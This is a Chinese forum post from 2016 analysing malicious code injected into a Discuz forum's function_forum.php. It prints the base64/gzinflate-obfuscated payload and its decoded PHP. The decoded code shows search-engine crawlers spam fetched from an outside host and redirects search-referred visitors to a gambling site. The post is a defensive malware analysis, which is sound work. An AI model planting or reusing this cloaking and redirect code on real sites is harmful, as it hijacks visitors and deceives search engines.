忘记密码?

一键登录

草根吧源码论坛

Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析

查看: 161|回复: 0

Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析

[复制链接]

1721

主题

2212

热度

613

贡献

民审

Rank: 8Rank: 8

发表于 2016-7-6 16:12:02 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
本帖最后由 民审-M 于 2016-7-6 16:13 编辑

          最近,核心会员网站接连被人植入恶意代码,访问会被跳转到博彩网站,而且每个跳转网址还不一样,经过检测,发现注入点在function_forum.php文件,分析如下:
草根吧 Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析 会员,网站,而且,检测,恶意代码 精品教程 160909jxfvn1901s12dzgx

恶意代码:
  1. eval(gzinflate(base64_decode('DdNHkqNWAADQ/VxkuosFfDI1trsQSSChT04bFzmKHASnt98d3s8/f/2M1fjrV77H3Vd51X3RxWv+lcRLTpP/Znk6ZPnXbzF73dNpVXleNHcbPRlfu7W8PaCrTfq1IEkSmCQncyZtbfX6URT9Ka1EU6AocxF5kH2w9PxwXr9W2ctfvIbd3w/i6FBUZdtNCDTqg0QxHI0XN/CnmKxPO2hXfgM4F/jUjtfDq0i70VRlp0iAdUt45qPwjWG8JE8eydZa0tnTN4xZoZwcnso66NLyEeJbZdrgTbd6YiB47hXvW72SPT2+hWw2etvFzhSHkgUvUW8IapgIykhUUaJtjknZXYPUwH0IXmL1ckPClalA4UMVUxQqlFQvH8/64aa6JAbKHcvjkz3MKARd94TlSdLaw1ojCaR3Q+U5atTeWMUHMB7EpFpw4l5E/PKJmSsqM9orT7wkoA7UhY7vWjVbYmGWUD3mDemNeiXo5mISSi2Dy6eT4B3uqNorHbaetHXzwGSk3e4Kz160+qL1XC/o8ijevKPHoSrHqX3RTQl9pxBlzq9kLnYvcmRH93zEqFyR8OgBht91/bzNGGF7mlbg2X0Daped4qK0swHSaZLCFhTmkKKn4Io+cAin2zhcypGFuI21LMuPSYfyMxhDZEwxlpdmak1IbFcOzEtvH+nS6ipqqM9opX7Dv4Jy5uVVMCGn3PUWuJm7kxKPzG6t6pAMkJbWdIaXX+5zCQn0aou0PqEXB6FRkWaI2pBmmaz7HKmw3lb0XU2b2+Xk80LgreK9kaT5V35oTPt0PIwRskXiRHHFXkQIndQuKjOX+yUFPo6VbRM3RJ5Zd7AR2aMDJbN1j9M+nzRH1nJ0s+FRJLv/Ir1B9tVP/KCFxHR9C8fQqqsmG22s8MPjoLGAskyDY06LB2xlPVnXsLG3Nx+SL41X0TPdVHeJ0qg2amdwDQVIspCkCh2pWCOOa/7wZvPpKEIDyFaknGf7YCSEiS1aixI7HfgjV4BxHS845lU0GlXQGYArAoJF9x5xUJP9+/f39/efXz//p/4P')));
复制代码



加密信息,解密后如下:
草根吧 Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析 会员,网站,而且,检测,恶意代码 精品教程 160702ans4fgf1mfd11fgd

代码如下:
  1. ?><?php

  2. ?><?php

  3. ?><?php

  4. ?><?php

  5. ?><?php
  6. session_start();
  7. error_reporting(E_ERROR);
  8. function IstmdsbSpider(){
  9.         $ValidEntry=false;
  10.         If(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("baidu.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("sogou.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("google.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("soso.com")) > 0  )
  11.         {
  12.                 $ValidEntry = true;
  13.         }
  14.         return $ValidEntry;
  15. }
  16. function ChecktmdsbRefresh(){
  17.         $ValidEntry=false;
  18.         If(strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("baidu.com")) > 0 or      strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("sogou.com")) > 0 or strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("google.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("soso.com")) > 0  )
  19.         {
  20.                 $ValidEntry = true;
  21.         }
  22.         return $ValidEntry;
  23. }

  24. function Checktmdsburl(){
  25.         $ValidEntry=false;
  26.         if (strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("topicview=")) > 0 or strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("content____")) > 0  or strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("Pp")) > 0)
  27.         {
  28.                 $ValidEntry = true;
  29.         }
  30.         return $ValidEntry;
  31. }

  32. if (!IstmdsbSpider())
  33. {
  34.         if (ChecktmdsbRefresh())
  35.                 if (Checktmdsburl())
  36.                         {
  37.                 header( "location: http://www.fuckworld.org/ad/ad.htm?".$_SERVER['SERVER_NAME']);
  38.                 exit();
  39.         }
  40.         
  41. }else{
  42.                 echo file_get_contents("http://ri.toh.info:8080/");
  43.                 ob_end_flush();
  44. }

  45. ?><?
  46. ?><?
  47. ?><?
  48. ?><?
  49. ?><?
复制代码

样本:
草根吧 Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析 会员,网站,而且,检测,恶意代码 精品教程 zip function_forum.zip (9.21 KB, 下载次数: 1)

帖子地址: 

本文来源于草根吧源码论坛 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索
回复

举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表